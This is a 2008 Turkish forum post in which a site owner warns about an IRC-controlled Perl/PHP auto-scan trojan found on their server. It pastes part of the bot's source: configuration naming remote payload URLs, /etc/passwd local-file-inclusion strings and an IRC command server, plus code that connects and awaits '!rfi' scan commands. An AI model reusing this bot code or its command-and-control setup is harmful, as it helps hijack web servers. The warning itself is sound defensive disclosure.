Konu: Dikkat, farklı bir TROJAN!
Tekil Mesaj gösterimi
  #1 (permalink)   iTrader 
Alt 2008-04-19, 16:06
SavaS - ait Kullanıcı Resmi (Avatar)
SavaS SavaS isimli üyemiz çevrimdışıdır. (Offline)
Member
  
Üyelik tarihi: Jun 2007
Nerden: Antalya
Mesajlar: 123
Tecrübe Puanı: 2
iTrader: %0/0
SavaS is an unknown quantity at this point
Standart Dikkat, farklı bir TROJAN!
Selam,

Sitemin biri için "RSA Anti-Fraud Command Center
(afcc@rsasecurity.com)" adresinden bir mail gelmiş geçen gün. Mailde sitemin birinde bilgim dışında biri trojan scan ettiriyormuş. (Adresi vermeyeceğim güvenlik açısından.)

Bu virüs, sitemin chmodu 777 olan bir klasöre bir şekilde bulaştırılmış, perl ve php kodlarıyla yazılmış IRC üzerinden yönetilen bir oto-scan trojan/virüstür.

RSA nın belirttiği dosyanın bulunduğu klasöre baktığımda 10-20 arası dosya bulunmaktaydı. Silmeye çalıştığımda ise, bir kaçı silinmedi. Silinmeyen dosyaların birinin içinde;
Kod:
#################
#[Configuration]#
#################
my $response = "http://www.zinforma.com/arab.txt"; # included in zip as response.txt
my $test = "http://need-this.info/pretty/234/control/id2.txt"; # included in zip as test.txt
my $printcmd = "-=Hidup Hanya Sebuah Ilusi=-";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://www.teste.dark-hosting.be/mohaa/echo.txt";
my $nickname = "TDO^Scan".(int(rand(999)));
my $ident = "racrew";
my $channel = "#tondano";
my $server = "irc.racrew.us";
my $port = 6667;
#################
#[Configuration]#
#################

my $sock;
my $exploitcounter = 100;
my @User_Agent = &Agent();
my $pid = fork();
if($pid==0){
 &connectirc($nickname,$ident,$channel,$server,$port);
}else{
 exit(0);
}

sub connectirc(){
 my($nickname,$ident,$channel,$server,$port)=@_;
 $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
 $sock->autoflush(1);
 print $sock "NICK ".$nickname."\r\n";
 print $sock "USER ".$ident." 8 * : r@cRew \r\n";
 print $sock "JOIN ".$channel."\r\n";
 while( $command = <$sock> ){

if($command =~ /\!rfi\s+(.*?)\s+(.*)/){
 if(fork() == 0){
  my($bug,$dork)=($1,$2);
  &scan($bug,$dork);
   exit(0);
 }
}
Şeklinde devam eden bir kod buldum. Bu trojanın kontrolü irc.racrew.us sunucusundaki yöneticiler (mi desem artık user mi desem) tarafından yapılıyor.

Sunucuya girip nelerin olup bittiğine bakabilirsiniz.

Sunucularınızdaki güvenliği arttırmanız tavsiye edilir.

Bu arada trojanı bhlynx script yardımıyla çoğaltıyorlar sanırım.

__________________
Editor of DMOZ.
Alıntı ile Cevapla